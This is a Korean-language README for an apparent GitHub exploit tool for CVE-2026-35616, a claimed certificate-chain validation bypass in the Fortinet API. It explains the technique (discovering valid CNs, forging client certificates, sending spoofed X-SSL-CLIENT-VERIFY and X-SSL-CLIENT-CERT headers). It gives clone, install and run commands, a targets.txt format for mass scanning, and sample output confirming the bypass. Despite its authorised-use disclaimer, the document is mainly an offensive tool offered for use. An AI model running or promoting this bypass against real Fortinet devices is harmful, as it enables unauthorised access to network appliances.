
CVE-2026-35616용 익스플로잇 스크립트로, 유효한 CN을 발견하고 위조 클라이언트 인증서를 생성한 후 사용자 지정 헤더로 보호된 엔드포인트를 탐색하여 Fortinet API의 인증서 체인 검증을 우회합니다.
Fortinet API의 인증서 체인 검증 우회 취약점을 악용합니다.
이 스크립트는 다양한 소스에서 유효한 Common Name(CN)을 자동으로 탐지하고,
가짜 클라이언트 인증서를 생성한 후 X-SSL-CLIENT-VERIFY 및 X-SSL-CLIENT-CERT 헤더를
사용하여 보호된 엔드포인트에 요청을 수행합니다.
!!!중요: 테스트에 대한 명시적 허가를 받은 시스템에서만 사용하십시오.
requestscryptographyurllib3openssl (TLS 핸드셰이크를 통한 고급 CA 탐지용)# 프로젝트 클론
git clone https://github.com/wa6n3r/CVE-2026-35616
cd CVE-2026-35616
# 종속성 설치
pip install -r requirements.txt
## 사용법
# 기본 실행
python3 exploit.py
# 대상 및 포트 지정
python3 exploit.py <TARGET_IP> [PORT]
# 예시:
python3 exploit.py 192.168.1.100
python3 exploit.py 10.0.0.50 8443
# 대상 파일 형식 (targets.txt)
대량 테스트 시 각 줄에 대상 주소 하나씩 targets.txt 파일을 생성하십시오:
192.168.1.100:443
10.0.0.50:8443
fortigate.internal
# 출력 파일
성공적으로 실행되면 스크립트는 다음을 생성합니다:
results/bypass_results_<TARGET>_<PORT>_<TIMESTAMP>.json — 다음을 포함한 JSON 형식의 상세 보고서:
사용된 CN
각 엔드포인트의 응답 상태
분석용 응답 접두사
# 출력 구조
[ wa6n3r ] ◆ GH: github.com/wa6n3r ◆ WEB: wa6n3r.com
[*] CVE-2026-35616 대상: https://192.168.1.100:443
[*] 여러 소스에서 CA CN 탐지 중...
[•] TLS CA CN: 'fortinet-ca2'
[•] ZTNA CA CN: 'support'
[*] 후보 CN 2개 발견: fortinet-ca2, support
[*] 우회 테스트를 위한 후보 CN 2개 검사 중...
[+] CN='support' | HTTP 200 | retval=1 | 우회 확인됨
[*] CN='support'로 모든 cert_chain 엔드포인트 프로빙 중...
GET /api/v1/system/capabilities
HTTP 200: '{"result": {"retval": 1, ...}}'
[+] 결과 저장 위치: results/bypass_results_192.168.1.100_443_20260101_120000.json